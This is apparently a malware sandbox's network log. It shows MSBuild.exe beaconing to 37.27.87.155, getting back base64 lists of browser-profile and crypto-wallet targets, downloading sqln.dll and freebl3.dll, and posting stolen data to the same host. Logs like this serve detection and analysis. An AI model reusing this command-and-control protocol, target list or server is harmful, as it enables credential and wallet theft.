                                                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C0260b8e04ad19c244dfaa60e7b0ec044; Path=/; Secure; HttpOnly; SameSite=None
2024-04-20 12:28:08 UTC | 14514 | IN
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                                                          2024-04-20 12:28:08 UTC10062INData Raw: 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                                          Data Ascii: obal_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                                                          2024-04-20 12:28:08 UTC9214INData Raw: 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49 43 4f 4e 5f 42 41
                                                                                                                                                                                                                                                                          Data Ascii: teamgames.com\/&quot;,&quot;STATS_BASE_URL&quot;:&quot;https:\/\/partner.steampowered.com\/&quot;,&quot;INTERNAL_STATS_BASE_URL&quot;:&quot;https:\/\/steamstats.valve.org\/&quot;,&quot;IN_CLIENT&quot;:false,&quot;USE_POPUPS&quot;:false,&quot;STORE_ICON_BA


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:09 UTC | 169 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-04-20 12:28:09 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:09 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-04-20 12:28:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49733 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:10 UTC | 261 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 279
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:10 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 46 31 44 42 35 42 45 38 39 38 32 33 33 33 33 36 34 31 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                                                          Data Ascii: ------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="hwid"C6F1DB5BE8982333364192-a33c7340-61ca-11ee-8c18-806e6f6e6963------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------
2024-04-20 12:28:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:10 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:10 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|0|7297022d6b5036db57a52911a47bf8d9|1|1|1|0|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49734 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:11 UTC | 261 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFID
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CFCBKKKJJJKKEBGDAFIDCont
2024-04-20 12:28:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:12 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:12 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49735 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:12 UTC | 261 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------BKFBAKFCBFHIJJJJDBFCCont
2024-04-20 12:28:13 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:13 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:13 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                          Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49736 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:14 UTC | 262 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 6237
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-04-20 12:28:14 UTC  6237  OUT  Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CFCBFBGDBKJKECAAKKFHCont
2024-04-20 12:28:15 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:15 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
6  192.168.2.4  49737  37.27.87.155  443  4076  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp  Bytes transferred  Direction  Data
2024-04-20 12:28:15 UTC  177  OUT  GET /sqln.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:15 UTC  248  IN  HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:15 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Thu, 18 Apr 2024 12:03:08 GMT
Connection: close
ETag: "66210bfc-258600"
Accept-Ranges: bytes


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
7  192.168.2.4  49744  37.27.87.155  443  4076  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp  Bytes transferred  Direction  Data
2024-04-20 12:28:17 UTC  262  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 4677
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:17 UTC  4677  OUT  Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------EGIIIECBGDHJJKFIDAKJCont
2024-04-20 12:28:18 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:18 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49745 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:19 UTC | 262 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 1529
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:19 UTC | 1529 | OUT | Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------BGHJJDGHCBGDHIECBGIDCont
2024-04-20 12:28:19 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:19 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49746 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:20 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:20 UTC | 437 | OUT | Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------IEHIIIJDAAAAAAKECBFBCont
2024-04-20 12:28:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:21 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49747 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:21 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKF
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-20 12:28:21 UTC | 437 | OUT | Data Ascii: ------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------FHDHCAAKECFIDHIEBAKFCont
2024-04-20 12:28:22 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-20 12:28:22 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49748 | 37.27.87.155 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:22 UTC | 156 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-20 12:28:22 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Apr 2024 12:28:22 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-a7550"
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                                                          Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                                                          Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                                                          2024-04-20 12:28:23 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
